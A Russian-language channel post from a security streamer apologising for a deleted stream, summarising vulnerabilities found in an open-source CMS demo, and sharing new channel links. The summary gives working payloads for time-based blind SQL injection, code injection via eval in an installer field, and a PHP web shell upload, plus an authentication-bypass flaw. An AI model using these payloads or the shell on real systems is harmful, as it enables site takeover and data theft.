Друзья, привет!
У меня для вас несколько новостей.
❗️❕❗️ 1) Грустная
Пришлось удалить стрим.
Да, я знаю, что многие из вас просили, даже в донатах.
Так вышло, я рукожоп.
Мне нужно было вырезать из стрима один кусочек на несколько секунд, я это сделал в редакторе YouTube и похерил запись, пришлось удалять всё.
НО!
Я обещаю сделать следующий стрим на такую же тему. Возьмём другую CMS и поломаем её. Учту ваши замечания и постараюсь сделать лучше.
Извиняюсь перед всеми, я накосячил.
Остальные стримы будут оставаться на канале.
❗️❕❗️ 2) Позитивная №1
Надеюсь, она будет позитивной и хотя бы немного скрасит потерю стрима.
Тезисно по стриму:
- Ломали
https://www.opensourcecms.com/atarone/
Нашли:
1. time-based blind SQLi
File:
/ap-save.php
Payload:
page_id=1'+and+if(1=1,sleep(15),1)--+
2. RCE
File:
/installed.php
Payload:
&mysql_un=localhost'); eval($_GET[ololo]); echo('a
3. Unrestricted File Upload
File:
/ap-backup.php
,
/ap-save.php
Payload:
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: text/xml
<?php
if (isset($_REQUEST['ololo'])) eval($_REQUEST['ololo']));
4. Auth bypass
В админке нет завершения скрипта (exit или die) после проверки, можно пользоваться функционалом, игнорируя редирект.
❗️❕❗️ 3) Позитивная №2
Вчера вы накидали мне бабла, я смог взять домен и сервер на год.
Теперь у нас будет плацдарм для наших экспериментов.
Можно написать и там запустить какого-нибудь полезного бота для нашей группы. Ну или сервер minecraft :)
Также сделал прямые ссылки на группу, канал и Youtube.
Это будет полезно для друзей из РФ, где забанены домены телеграма.
Ссылки ниже:
http://no.offence.site/yt - YouTube
http://no.offence.site/group - Telegram group
http://no.offence.site/channel - Telegram channel
Еще раз прошу прощения за мой косяк. Дальше будет лучше.
Спасибо, что вы поддерживаете меня)